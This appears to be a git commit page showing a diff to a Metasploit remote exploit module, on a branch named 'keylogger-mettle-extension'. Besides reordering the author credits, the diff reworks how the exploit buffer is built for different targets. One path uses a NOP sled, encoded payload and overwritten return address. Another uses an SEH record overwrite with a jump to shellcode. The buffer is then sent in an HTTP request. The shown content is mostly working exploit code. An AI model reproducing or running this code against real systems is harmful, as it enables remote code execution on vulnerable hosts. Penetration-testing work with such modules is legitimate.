Updated per review comments.

MS-2855/keylogger-mettle-extension
Pearce Barry 2017-12-08 10:42:43 -06:00
parent c79186593a
commit 604b949e23
No known key found for this signature in database
GPG Key ID: 0916F4DEA5C5DE0A
1 changed files with 7 additions and 5 deletions


@ -23,8 +23,8 @@ class MetasploitModule < Msf::Exploit::Remote
'Author' =>
[
'vportal', # Vulnerability discovery and PoC
'Gabor Seljan', # Metasploit module
'Ahmad Mahfouz', # Vulnerability discovery and PoC
'Gabor Seljan', # Metasploit module
'Jacob Robles' # Metasploit module
],
'References' =>
@ -127,21 +127,23 @@ class MetasploitModule < Msf::Exploit::Remote
print_status("Selected Target: #{mytarget.name}")
end
if !(mytarget == targets[3])
case mytarget
when targets[1], targets[2]
sploit = make_nops(21)
sploit << payload.encoded
sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)
sploit << [mytarget.ret].pack('V')
sploit << rand_text_alpha(2500)
else
when targets[3]
seh = generate_seh_record(mytarget.ret)
sploit = payload.encoded
sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)
sploit[sploit.length, seh.length] = seh
sploit << make_nops(10)
sploit << "\xE9\x25\xBF\xFF\xFF" # JMP to ShellCode
sploit << Rex::Arch::X86.jmp(0xffffbf25) # JMP to ShellCode
sploit << rand_text_alpha(5000 - sploit.length)
else
fail_with(Failure::NoTarget, 'No matching target')
end
send_request_cgi(